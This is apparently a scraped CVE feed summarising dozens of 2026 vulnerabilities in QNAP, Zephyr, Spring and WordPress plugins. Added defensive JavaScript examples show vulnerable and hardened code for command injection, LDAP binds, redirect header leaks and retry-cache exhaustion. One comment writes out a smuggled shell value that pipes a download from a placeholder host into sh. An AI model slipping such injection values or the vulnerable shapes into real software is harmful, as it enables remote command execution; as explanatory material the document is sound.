366532 matches found

CVE-2026-44083 (added 2026/06/09 6:20 a.m.)

CVE-2026-44083 affects QuMagie. The vulnerability is an authorization bypass via a user-controlled key that could allow remote attackers to gain unintended privileges. Affected product: QuMagie (reported across multiple feeds). Root cause: authorization bypass enabling privilege escalation; explo...

CVSS 9.8 | AI score 5.5 | EPSS 0.0046 | Exploits 0 | References 1 | Affected software 1
CVE-2026-5068 (added 2026/06/09 6:20 a.m.)

CVE-2026-5068 affects Zephyr in the Bluetooth host L2CAP LE CoC path. When segmentation is enabled (chan_ops.alloc_buf) and the RX pool’s user_data_size is

CVSS 7.6 | AI score 5.5 | EPSS 0.00166 | Exploits 0 | References 1
CVE-2025-62858 (added 2026/06/09 6:17 a.m.)

CVE-2025-62858 is a buffer overflow affecting several QNAP OS lines (QTS 5.2.x and QuTS hero releases h5/h6) where an attacker with an administrator account could cause memory modification or process crashes. The vulnerability’s root cause is not explicitly detailed in the provided documents, but...

CVSS 6.5 | AI score 5.8 | EPSS 0.00445 | Exploits 0 | References 1 | Affected software 1
CVE-2026-5067 (added 2026/06/09 6:1 a.m.)

The CVE targets Zephyr’s HTTP server WebSocket upgrade path (CONFIG_HTTP_SERVER_WEBSOCKET enabled). A crafted Sec-WebSocket-Key header can trigger memory corruption via a non-NUL-terminated copy into a fixed-size buffer, followed by copying to a local stack buffer and using strlen(). If no NUL ex...

CVSS 9.8 | AI score 6 | EPSS 0.00498 | Exploits 0 | References 1
CVE-2026-8981 (added 2026/06/09 6:0 a.m.)

The CVE describes a vulnerability in the WordPress plugin Custom Block Builder (Lazy Blocks) prior to version 4.3.0. The issue arises because the plugin does not consistently check the unfiltered_html capability across all code paths that write to its block template fields, enabling an administr...

CVSS 3.5 | AI score 5.7 | EPSS 0.00138 | Exploits 0 | References 1
CVE-2026-4986 (added 2026/06/09 6:0 a.m.)

The CVE-2026-4986 entry concerns the WPForms WordPress plugin (pre-1.10.0.5). The issue is that incoming PayPal webhook events are not validated for authenticity before processing, enabling unauthenticated attackers to forge webhook payloads and manipulate the payment state of arbitrary transacti...

CVSS 5.3 | AI score 5.6 | EPSS 0.00197 | Exploits 0 | References 1
CVE-2026-41539 (added 2026/06/09 5:51 a.m.)

CVE-2026-41539 is a cross-site scripting (XSS) vulnerability affecting several QNAP operating system versions. The issue impacts QTS 5.2.9.3492+ and QuTS hero releases: h5.2.9.3499+, h5.3.4.3500+, and h6.0.0.3500+, all built around 2026-05-07 to 2026-05-20. Root cause and technical details are no...

CVSS 8.7 | AI score 5.2 | EPSS 0.00193 | Exploits 0 | References 1 | Affected software 1
CVE-2026-11572 (added 2026/06/09 5:0 a.m.)

The CVE-2026-11572 entry concerns the npm package degit. Affected versions are degit before 2.8.6, versions 3.0.0 to before 3.3.1, where user input used to construct git shell commands is directly passed to exec() in _cloneWithGit() and fetchRefs(). This improper sanitisation enables a remote att...

CVSS 8.8 | AI score 5.9 | EPSS 0.01057 | Exploits 0 | References 4
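The degit entry above describes the classic shape of Node command injection: untrusted input interpolated into a command string handed to child_process.exec(), which runs it through a shell. The following is an added example, not degit's code: it shows that unsafe shape next to the argv-based alternative. The allow-list patterns, the function names and the hypothetical GitHub URL prefix are assumptions; note that switching to execFile() alone is not enough, because a repo spec or ref beginning with "-" would still be parsed by git as an option (for example --upload-pack=<command>), which is why the "--" separator and the leading-dash check are there.

```javascript
// Added example, not code from the degit project. Allow-lists, names and the
// URL prefix are illustrative assumptions.

// Vulnerable shape (never executed here): the whole string is a shell command
// line, so a repo spec such as "user/repo; curl evil | sh" runs the extra command.
function unsafeGitCommand(repo, ref) {
  return `git ls-remote https://github.com/${repo} ${ref}`;
}

// Hardened shape: an argv array for execFile() (no shell), an allow-list on the
// inputs, and "--" so a value starting with "-" cannot become a git option.
const REPO_RE = /^[A-Za-z0-9_.-]+\/[A-Za-z0-9_.-]+$/;
const REF_RE = /^[A-Za-z0-9_.\/-]+$/;

function safeGitArgv(repo, ref) {
  if (typeof repo !== 'string' || !REPO_RE.test(repo) || repo.includes('..')) {
    throw new Error(`rejected repo spec: ${repo}`);
  }
  if (ref !== undefined && (typeof ref !== 'string' || !REF_RE.test(ref) || ref.startsWith('-'))) {
    throw new Error(`rejected ref: ${ref}`);
  }
  const argv = ['ls-remote', '--', `https://github.com/${repo}`];
  if (ref !== undefined) argv.push(ref);
  return argv;
}

// Runs git without a shell. Dynamic import keeps this usable from CommonJS or ESM.
async function fetchRefs(repo, ref) {
  const argv = safeGitArgv(repo, ref); // validate before touching child_process
  const { execFile } = await import('node:child_process');
  return new Promise((resolve, reject) => {
    execFile('git', argv, { timeout: 30_000 }, (err, stdout) => (err ? reject(err) : resolve(stdout)));
  });
}
```

The allow-list is deliberately narrower than what git accepts; a clone helper only needs owner/name and a ref, so anything outside that character set is rejected rather than escaped.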
CVE-2026-26236 (added 2026/06/09 4:6 a.m.)

CVE-2026-26236 (QuMagie) describes a missing authorization vulnerability in QuMagie that could allow remote attackers to access unauthorized data or perform unauthorized actions. The issue is rated with a high severity (CVSS v4.0: HIGH, network vector, attack complexity LOW, no privileges require...

CVSS 8.7 | AI score 5.5 | EPSS 0.00322 | Exploits 0 | References 1 | Affected software 1
CVE-2026-41007 (added 2026/06/09 4:0 a.m.)

Technical details are not publicly available in the provided documents. Monitor for updates.

CVSS 7.5 | AI score 5.5 | EPSS 0.00299 | Exploits 0 | References 1 | Affected software 1
CVE-2026-41006 (added 2026/06/09 3:57 a.m.)

Spring HATEOAS contains a deserialization vulnerability where internal PropertyUtils.createObjectFromProperties binds bean properties via reflection without honoring Jackson access-control annotations. This affects multiple supported branches: 1.5.x, 2.3.x, 2.4.x, 2.5.x, and 3.0.x up to 3.0.3. Th...

CVSS 7.5 | AI score 5.5 | EPSS 0.00276 | Exploits 0 | References 1 | Affected software 1
CVE-2026-41855 (added 2026/06/09 3:51 a.m.)

The CVE affects Spring Framework via unsafe deserialization in JMS converters: MappingJackson2MessageConverter and JacksonJsonMessageConverter allow arbitrary class instantiation in untrusted JMS environments, enabling gadget-based deserialization that could trigger unauthorized actions. Affected...

CVSS 8.1 | AI score 5.6 | EPSS 0.00257 | Exploits 0 | References 1
CVE-2026-41854 (added 2026/06/09 3:51 a.m.)

The CVE affects Spring Framework 7.0.0–7.0.7 and 6.2.0–6.2.18, where incorrect host parsing in UriComponentsBuilder may allow a server-side request forgery (SSRF) when parsing an externally provided URL string. The vulnerability is described as an SSRF condition resulting from this parsing flaw. ...

CVSS 6.5 | AI score 5.5 | EPSS 0.00123 | Exploits 0 | References 1 | Affected software 1
CVE-2026-41853 (added 2026/06/09 3:51 a.m.)

CVE-2026-41853 concerns Multipart request smuggling in Spring Framework’s Spring MVC and WebFlux components. Affected are Spring Framework versions: 7.0.0–7.0.7; 6.2.0–6.2.18; 6.1.0–6.1.27; 5.3.0–5.3.48. The CVE entry identifies the issue as a vulnerability in multipart handling, with an accompan...

CVSS 5.3 | AI score 5.5 | EPSS 0.00186 | Exploits 0 | References 1 | Affected software 1
CVE-2026-41980 (added 2026/06/09 3:51 a.m.)

Technical details are not publicly available in the provided documents. This CVE entry lacks specifics on affected product/version, root cause, or remediation. Monitor for updates from Huawei advisories and the CVE record.

CVSS 5.5 | AI score 5.4 | EPSS 0.00087 | Exploits 0 | References 3
CVE-2026-41852 (added 2026/06/09 3:51 a.m.)

The CVE affects Spring Framework via SpEL evaluation allowing arbitrary zero-argument method invocation in restricted/read-only contexts across multiple versions (7.0.0–7.0.7; 6.2.0–6.2.18; 6.1.0–6.1.27; 5.3.0–5.3.48). Root cause is the SpEL evaluation logic, enabling invocation of unintended app...

CVSS 5.3 | AI score 5.6 | EPSS 0.00164 | Exploits 0 | References 1 | Affected software 1
CVE-2026-41851 (added 2026/06/09 3:51 a.m.)

CVE-2026-41851 describes a Denial of Service risk in Spring Framework where evaluating user-provided SpEL expressions can trigger unbounded cache growth. Affected versions include Spring Framework 7.0.0–7.0.7, 6.2.0–6.2.18, 6.1.0–6.1.27, and 5.3.0–5.3.48. The DoS arises from how SpEL expressions ...

CVSS 7.5 | AI score 5.4 | EPSS 0.0036 | Exploits 0 | References 1 | Affected software 1
CVE-2026-41850 (added 2026/06/09 3:51 a.m.)

Spring Framework vulnerability CVE-2026-41850 affects the evaluation of user-supplied Spring Expression Language (SpEL) expressions. The issue is an Algorithmic Denial of Service (DoS) caused by crafted expressions triggering excessive resource consumption during evaluation, degrading or taking d...

CVSS 7.5 | AI score 5.5 | EPSS 0.0036 | Exploits 0 | References 1 | Affected software 1
CVE-2026-41849 (added 2026/06/09 3:51 a.m.)

The CVE-2026-41849 entry affects Spring Framework 5.3.0–5.3.48 and is caused by an integer overflow in the SpEL evaluation logic. Exploitation via a crafted SpEL expression can trigger excessive resource consumption, leading to a Denial of Service. The connected documents specify the vulnerabilit...

CVSS 7.5 | AI score 5.5 | EPSS 0.00263 | Exploits 0 | References 1 | Affected software 1
CVE-2026-41848 (added 2026/06/09 3:51 a.m.)

CVE-2026-41848 affects Spring Framework via a ReDoS vulnerability in AntPathMatcher. Affected versions are 7.0.0–7.0.7, 6.2.0–6.2.18, 6.1.0–6.1.27, and 5.3.0–5.3.48. The issue arises when a crafted pattern is supplied to AntPathMatcher methods (match, matchStart, extractUriTemplateVariables). The...

CVSS 7.5 | AI score 5.4 | EPSS 0.00317 | Exploits 0 | References 1 | Affected software 1
CVE-2026-41847 (added 2026/06/09 3:51 a.m.)

CVE-2026-41847: Spring Framework WebFlux Kotlin Router DSL may be vulnerable to a security bypass. Affected versions: Spring Framework 5.3.0 through 5.3.48. The CVE records a bypass in WebFlux when using the Kotlin Router DSL, with a CVSS v3.1 base score of 4.8 (Medium). Impact indicators in the...

CVSS 5.3 | AI score 5.4 | EPSS 0.00166 | Exploits 0 | References 1 | Affected software 1
CVE-2026-41846 (added 2026/06/09 3:50 a.m.)

The CVE concerns Spring Framework: JSP form tag attributes cssClass, cssErrorClass, and cssStyle in Spring MVC applications can be exploited to inject arbitrary HTML/JavaScript, enabling cross-site scripting (XSS). Affected versions are Spring Framework 7.0.0–7.0.7; 6.2.0–6.2.18; 6.1.0–6.1.27; 5....

CVSS 6.1 | AI score 5.4 | EPSS 0.0014 | Exploits 0 | References 1 | Affected software 1
CVE-2026-41845 (added 2026/06/09 3:50 a.m.)

The CVE-2026-41845 entry affects Spring Framework versions 7.0.0–7.0.7, 6.2.0–6.2.18, 6.1.0–6.1.27, and 5.3.0–5.3.48. The issue stems from incorrect escaping in JavaScriptUtils.javaScriptEscape(), which may allow JavaScript code injection in the browser and enable cross-site scripting (XSS). The ...

CVSS 7.1 | AI score 5.3 | EPSS 0.00161 | Exploits 0 | References 1 | Affected software 1
CVE-2026-41844 (added 2026/06/09 3:50 a.m.)

The CVE-2026-41844 entry concerns Spring Framework components Spring MVC and Spring WebFlux. Affected are Spring Framework versions 7.0.0–7.0.7; 6.2.0–6.2.18; 6.1.0–6.1.27; and 5.3.0–5.3.48. Description: when an application configures a mapping for "/**" and the view name is not explicitly specif...

CVSS 6.1 | AI score 5.6 | EPSS 0.00134 | Exploits 0 | References 1 | Affected software 1
CVE-2026-41843 (added 2026/06/09 3:50 a.m.)

CVE-2026-41843 affects Spring Framework, specifically Spring MVC and WebFlux, where path traversal can occur when resolving static resources. Affected versions include 7.0.0–7.0.7, 6.2.0–6.2.18, 6.1.0–6.1.27, and 5.3.0–5.3.48. The connected documents confirm the vulnerability class as path traver...

CVSS 5.9 | AI score 5.5 | EPSS 0.00341 | Exploits 0 | References 1 | Affected software 1
CVE-2026-41842 (added 2026/06/09 3:50 a.m.)

The CVE-2026-41842 entry affects Spring Framework in Spring MVC and WebFlux, reporting a Denial of Service (DoS) when resolving static resources. Affected versions are Spring Framework 7.0.0–7.0.7; 6.2.0–6.2.18; 6.1.0–6.1.27; 5.3.0–5.3.48. The description in both records states the DoS vulnerabil...

CVSS 7.5 | AI score 5.5 | EPSS 0.00399 | Exploits 0 | References 1 | Affected software 1
CVE-2026-41979 (added 2026/06/09 3:50 a.m.)

CVE-2026-41979 describes a permission-control vulnerability in the print module. The impact is stated as potentially affecting integrity and confidentiality, with CVSSv3.1 indicating a MEDIUM base score (5.5) and a LOCAL attack vector requiring user interaction (no privileges required, low attack...

CVSS 5.5 | AI score 5.5 | EPSS 0.00075 | Exploits 0 | References 2
CVE-2026-41841 (added 2026/06/09 3:50 a.m.)

CVE-2026-41841 affects Spring Framework versions 5.3.0–5.3.48; 6.1.0–6.1.27; 6.2.0–6.2.18; 7.0.0–7.0.7. It describes Information Disclosure via the static resource cache in Spring MVC and WebFlux when resolving static resources. The root cause and exact exploit path are not detailed in the provid...

CVSS 5.9 | AI score 5.5 | EPSS 0.00313 | Exploits 0 | References 1 | Affected software 1
CVE-2026-41840 (added 2026/06/09 3:50 a.m.)

Spring WebFlux applications are vulnerable to Denial of Service when processing multipart requests. Affected: Spring Framework 7.0.0–7.0.7; 6.2.0–6.2.18; 6.1.0–6.1.27; 5.3.0–5.3.48. CVSSv3.1: AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H (base score 5.9, MEDIUM). Exploitation details are not provided in th...

CVSS 5.9 | AI score 5.8 | EPSS 0.00247 | Exploits 0 | References 1 | Affected software 1
CVE-2026-41839 (added 2026/06/09 3:49 a.m.)

The CVE-2026-41839 affects Spring Framework WebFlux. A WebFlux application with a compromised subdomain (e.g., via XSS) is vulnerable to an escalation attack that exchanges a known session ID for that of an authenticated user. Affected versions are: Spring Framework 7.0.0–7.0.7; 6.2.0–6.2.18; 6.1...

CVSS 4.2 | AI score 5.2 | EPSS 0.00197 | Exploits 0 | References 1
CVE-2026-41838 (added 2026/06/09 3:49 a.m.)

Spring Framework's WebSocket session IDs in the spring-websocket module are not cryptographically unpredictable, enabling potential session hijacking in environments with weak authorization. Affected: Spring Framework 7.0.0–7.0.7; 6.2.0–6.2.18; 6.1.0–6.1.27; 5.3.0–5.3.48. Risk summary: predictabl...

CVSS 7.5 | AI score 5.5 | EPSS 0.00171 | Exploits 0 | References 1 | Affected software 1
CVE-2026-41720 (added 2026/06/09 3:48 a.m.)

CVE-2026-41720 affects Spring LDAP, where DirContextAuthenticationStrategy implementations fail to reject a bind request that uses a non-empty username with an empty or null password. Affected versions include 2.4.0–2.4.4, 3.2.0–3.2.17, 3.3.0–3.3.7, and 4.0.0–4.0.3. The CVE description in both th...

CVSS 7.4 | AI score 5.4 | EPSS 0.00257 | Exploits 0 | References 1
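The Spring LDAP entry above is the old LDAP pitfall: RFC 4513 section 5.1.2 defines an "unauthenticated bind" (a name together with an empty password) that a directory server may answer with success without having verified anything, so a login form that forwards an empty password straight to bind() accepts the login. The following is an added example, not Spring LDAP's code; the in-memory FakeDirectory is a constructed stand-in that imitates a server permitting unauthenticated binds, and the DN layout and username character set are assumptions.

```javascript
// Added example, not code from Spring LDAP. FakeDirectory is a constructed
// stand-in for a server that permits RFC 4513 unauthenticated binds.
class FakeDirectory {
  constructor(entries) { this.entries = entries; } // { dn: password }

  // Empty or null password: the server treats the bind as anonymous and
  // reports success with an empty authorization identity.
  bind(dn, password) {
    if (password === '' || password == null) return { ok: true, authzId: '' };
    if (Object.prototype.hasOwnProperty.call(this.entries, dn) && this.entries[dn] === password) {
      return { ok: true, authzId: dn };
    }
    return { ok: false, authzId: null };
  }
}

const USERNAME_RE = /^[A-Za-z0-9._-]+$/; // assumed allow-list; also blocks DN injection

function userDn(username) {
  return `uid=${username},ou=people,dc=example,dc=com`; // assumed DN layout
}

// Vulnerable: whatever the user typed goes to bind(), and bind success is trusted.
function authenticateUnsafe(dir, username, password) {
  return dir.bind(userDn(username), password).ok;
}

// Fixed: refuse empty/null passwords and malformed usernames before any bind,
// and insist that the server authorised us as the DN we asked for.
function authenticateSafe(dir, username, password) {
  if (typeof username !== 'string' || !USERNAME_RE.test(username)) return false;
  if (typeof password !== 'string' || password.length === 0) return false;
  const dn = userDn(username);
  const r = dir.bind(dn, password);
  return r.ok === true && r.authzId === dn;
}
```

The authzId comparison is belt and braces: even a server that misreports an anonymous bind as a success will not have bound as the requested user, and the check catches that independently of the password validation.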
CVE-2026-41978 (added 2026/06/09 3:48 a.m.)

The CVE-2026-41978 entry documents a permission-control vulnerability in the clone module with potential confidentiality impact. CVSS v3.1 metrics indicate a MEDIUM severity (4.4), LOCAL attack vector, LOW confidentiality impact, and a requirement for user interaction. No exploit details or remedia...

CVSS 4.4 | AI score 5.5 | EPSS 0.00075 | Exploits 0 | References 1
CVE-2026-41715 (added 2026/06/09 3:48 a.m.)

CVE-2026-41715 affects the Reactor Netty HTTP Client. When redirects are enabled, HTTP redirects from secure to insecure endpoints may leak credentials and expose sensitive data. Affected versions are Reactor Netty 1.0.0–1.0.51; 1.1.0–1.1.35; 1.2.0–1.2.17; 1.3.0–1.3.5. The provided documents do n...

CVSS 6.1 | AI score 5.5 | EPSS 0.00172 | Exploits 0 | References 1
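The Reactor Netty entry above is about what a client does with credentials when it follows a redirect. The following is an added example, not Reactor Netty's code: a redirect policy that a client should apply before the next hop. It treats an https: to http: redirect as a downgrade that is refused by default, and drops Authorization, Proxy-Authorization and Cookie whenever the target origin differs from the current one (a downgrade always changes the origin, so the headers are stripped even when the caller opts into following it). The function names and the option name are assumptions; URL handling is the standard WHATWG URL API.

```javascript
// Added example, not code from Reactor Netty. Names and the allowDowngrade
// option are illustrative assumptions.
const SENSITIVE = ['authorization', 'proxy-authorization', 'cookie'];

function isDowngrade(from, to) {
  return from.protocol === 'https:' && to.protocol === 'http:';
}

function isCrossOrigin(from, to) {
  return from.origin !== to.origin; // origin = scheme + host + port
}

// Returns { url, headers } for the next request, or null when the redirect
// must not be followed at all.
function nextHop(currentUrl, location, headers, { allowDowngrade = false } = {}) {
  const from = new URL(currentUrl);
  const to = new URL(location, from); // Location may be relative
  if (to.protocol !== 'http:' && to.protocol !== 'https:') return null;
  if (isDowngrade(from, to) && !allowDowngrade) return null;

  const next = {};
  for (const [name, value] of Object.entries(headers)) {
    if (isCrossOrigin(from, to) && SENSITIVE.includes(name.toLowerCase())) continue;
    next[name] = value;
  }
  return { url: to.href, headers: next };
}

// Vulnerable behaviour for contrast: forwards every header to wherever Location points,
// so a bearer token minted for https://api.example.com travels in cleartext.
function nextHopUnsafe(currentUrl, location, headers) {
  return { url: new URL(location, currentUrl).href, headers: { ...headers } };
}
```

A client that also sends credentials from a URL userinfo or a credential provider needs the same origin check in that path; the header filter only covers what was already attached to the request.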
CVE-2026-41710 (added 2026/06/09 3:48 a.m.)

The CVE-2026-41710 issue affects Spring Retry versions 2.0.0–2.0.12 and 1.3.0–1.3.4. An attacker can craft a large number of unique requests that trigger failures, exhausting the application-wide stateful retry cache. Once the cache is full, it permanently rejects further updates, causing all lat...

CVSS 5.9 | AI score 5.5 | EPSS 0.0028 | Exploits 0 | References 1
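The Spring Retry entry above describes a stateful retry cache that, once filled with unique failing keys, refuses every new key. The following is an added example, not Spring Retry's code and not its fix: a constructed model of that failure mode next to a bounded cache that evicts the least recently used entry instead of refusing new work. The class and function names are assumptions; the simulation drives both with the attacker pattern the entry describes (many unique failing requests) and then asks whether a legitimate user's retry state can still be recorded.

```javascript
// Added example, not code from Spring Retry. A constructed model of a
// stateful retry cache; names are illustrative.

// Failure mode: fixed capacity, and a new key is refused once the cache is full.
// An attacker who can trigger `capacity` unique failures freezes the cache for everyone.
class ExhaustibleRetryCache {
  constructor(capacity) { this.capacity = capacity; this.map = new Map(); }
  // Records a failed attempt for key; returns false when the key is new and the cache is full.
  recordFailure(key) {
    if (!this.map.has(key) && this.map.size >= this.capacity) return false;
    this.map.set(key, (this.map.get(key) || 0) + 1);
    return true;
  }
  attempts(key) { return this.map.get(key) || 0; }
  size() { return this.map.size; }
}

// Bounded alternative: same capacity, but the least recently used key is evicted,
// so an attacker can only churn the cache, never make it refuse new keys.
class BoundedLruRetryCache {
  constructor(capacity) { this.capacity = capacity; this.map = new Map(); }
  recordFailure(key) {
    const n = (this.map.get(key) || 0) + 1;
    this.map.delete(key);   // re-insert so Map iteration order equals recency
    this.map.set(key, n);
    if (this.map.size > this.capacity) this.map.delete(this.map.keys().next().value);
    return true;
  }
  attempts(key) { return this.map.get(key) || 0; }
  size() { return this.map.size; }
}

// Stateful retry decision: retry while this key has failed fewer than maxAttempts times.
// With the exhaustible cache a refused key yields "no retry" even on its first failure.
function shouldRetry(cache, key, maxAttempts) {
  if (!cache.recordFailure(key)) return false;
  return cache.attempts(key) < maxAttempts;
}

// Attacker sends `count` unique failing requests, then a legitimate request fails once.
function simulate(cache, count) {
  for (let i = 0; i < count; i++) cache.recordFailure(`attacker-${i}`);
  return shouldRetry(cache, 'legit-order-42', 3);
}
```

Eviction is not free of trade-offs: an attacker can now push a victim's key out and reset its attempt count, so in practice the bound is combined with an expiry and with per-client rate limits rather than used alone.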
CVE-2026-40984 (added 2026/06/09 3:47 a.m.)

CVE-2026-40984 details (from provided sources): Affects Micrometer HTTP server instrumentations across micrometer-core and micrometer-jetty variants (various versions listed in the initial entry). The vulnerability is a DoS triggered by specially crafted HTTP requests. The CVSS v3.1 base score is...

CVSS 7.5 | AI score 5.4 | EPSS 0.00416 | Exploits 0 | References 1
CVE-2026-41975 (added 2026/06/09 3:47 a.m.)

CVE-2026-41975 concerns a permission management vulnerability in the network management module. The available data indicate a local attack vector with high attack complexity and requires user interaction, but privileges are reported as LOW. The projected impact includes both confidentiality and a...

CVSS 6.3 | AI score 5.5 | EPSS 0.00067 | Exploits 0 | References 2
CVE-2026-40983 (added 2026/06/09 3:46 a.m.)

CVE-2026-40983 affects Micrometer’s gRPC server instrumentation. The issue allows a user to send specially crafted gRPC requests that may cause a denial-of-service (DoS) condition. Affected versions are Micrometer 1.16.0–1.16.5 and 1.15.0–1.15.11. The CVSSv3.1 base score is 7.5 (HIGH), with netwo...

CVSS 7.5 | AI score 5.4 | EPSS 0.00344 | Exploits 0 | References 1
CVE-2026-8895 (added 2026/06/09 3:41 a.m.)

CVE-2026-8895 affects the WordPress plugin kk blog card up to version 1.3. The vulnerability is a Stored Cross-Site Scripting (Stored XSS) in the plugin’s blog-card shortcode, caused by insufficient sanitization and output escaping of the shortcode’s href and type attributes. These values are con...

CVSS 6.4 | AI score 5.7 | EPSS 0.00181 | Exploits 0 | References 3
CVE-2026-10553 (added 2026/06/09 3:41 a.m.)

CVE-2026-10553 affects the WordPress plugin jquery-hover-footnotes (≤ 1.4). The root cause is missing/incorrect nonce validation in the jqFootnotes_options_subpanel function, enabling unauthenticated actors to update the plugin’s settings. Updated option values (e.g., jqfoot_anchor_open, jqfoot_...

CVSS 4.3 | AI score 5.5 | EPSS 0.00145 | Exploits 0 | References 4
CVE-2026-8904 (added 2026/06/09 3:41 a.m.)

The CVE-2026-8904 entry concerns the WordPress plugin FastPicker, up to version 1.0.2. The underlying issue is missing or incorrect nonce validation in the settingsPage function, enabling Cross-Site Request Forgery. This allows unauthenticated attackers to modify plugin settings (e.g., webhook in...

CVSS 4.3 | AI score 5.4 | EPSS 0.00124 | Exploits 0 | References 3
CVE-2026-11603 (added 2026/06/09 3:41 a.m.)

CVE-2026-11603 affects the WordPress plugin Product Filter Widget for Elementor, vulnerable in all versions up to 1.0.6. The root cause is reflected Cross-Site Scripting via the args[filterFormArray] parameter, due to insufficient input sanitization and output escaping. The endpoint is registere...

CVSS 6.1 | AI score 5.7 | EPSS 0.00205 | Exploits 0 | References 2
CVE-2026-10738 (added 2026/06/09 3:41 a.m.)

The CVE concerns the WordPress plugin jQuery Hover Footnotes, vulnerable in all versions up to 1.4. The root cause is insufficient input sanitization and output escaping in the Footnote Qualifier using a {{...}} syntax, enabling Stored XSS for authenticated users with author-level access and abov...

CVSS 6.4 | AI score 5.7 | EPSS 0.00253 | Exploits 0 | References 5
CVE-2026-8910 (added 2026/06/09 3:41 a.m.)

The CVE refers to the WordPress plugin WP Emoticon Rating (versions

CVSS 6.1 | AI score 5.4 | EPSS 0.0012 | Exploits 0 | References 7
CVE-2026-8882 (added 2026/06/09 3:41 a.m.)

CVE-2026-8882 affects the WP ApplicantStack Jobs Display WordPress plugin (versions up to 1.1.1). The vulnerability is a Stored Cross-Site Scripting via Shortcode Attributes caused by insufficient input sanitization and output escaping, exploitable by authenticated users with contributor-level ac...

CVSS 6.4 | AI score 5.7 | EPSS 0.00181 | Exploits 0 | References 3
CVE-2026-7662 (added 2026/06/09 3:41 a.m.)

CVE-2026-7662 describes a Stored Cross-Site Scripting vulnerability in the WordPress plugin ePaperFlip Publisher (versions

CVSS 6.4 | AI score 5.7 | EPSS 0.00192 | Exploits 0 | References 3
CVE-2026-8977 (added 2026/06/09 3:41 a.m.)

The WP GDPR Cookie Consent plugin for WordPress (versions up to and including 1.0.0) is vulnerable to Stored Cross-Site Scripting via the ninja_gdpr_ajax_actions AJAX action. The root cause is multi-fold: missing capability and nonce checks in handleAjaxCalls(), insufficient input sanitization of...

CVSS 6.4 | AI score 5.7 | EPSS 0.00188 | Exploits 0 | References 5
CVE-2026-8909 (added 2026/06/09 3:41 a.m.)

WpMobi WordPress plugin (versions ≤ 0.0.3) is vulnerable to Cross-Site Request Forgery due to missing/incorrect nonce validation in handleSaveGeneralSettings. This allows unauthenticated attackers to modify General Settings and inject scripts into an administrator’s browser via unescaped app_name...

CVSS 4.3 | AI score 5.5 | EPSS 0.00128 | Exploits 0 | References 4
CVE-2026-9185 (added 2026/06/09 3:41 a.m.)

CVE-2026-9185 affects the WordPress plugin 6Storage Rentals (versions

CVSS 7.5 | AI score 5.5 | EPSS 0.00403 | Exploits 0 | References 11
CVE-2026-8902 (added 2026/06/09 3:41 a.m.)

CVE-2026-8902 affects the WordPress plugin “AJAX Report Comments” (versions ≤ 2.0.4). The vulnerability stems from missing or incorrect nonce validation on the rc_options_page function, enabling Cross‑Site Request Forgery. This allows unauthenticated attackers to forge requests and modify plugin ...

CVSS 4.3 | AI score 5.4 | EPSS 0.00124 | Exploits 0 | References 3
Total number of security vulnerabilities: 366532